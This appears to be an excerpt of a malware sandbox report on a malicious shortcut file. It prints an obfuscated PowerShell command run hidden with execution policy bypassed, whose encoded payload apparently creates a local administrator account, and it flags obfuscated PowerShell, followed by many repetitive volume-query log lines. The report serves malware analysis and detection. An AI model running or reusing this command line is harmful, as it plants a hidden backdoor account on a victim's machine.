bxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=

        Language, Device and Operating System Detection

        barindex
        Yara detected Obfuscated Powershell
        Source: Yara matchFile source: cOOhDuNWt7.lnk, type: SAMPLE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
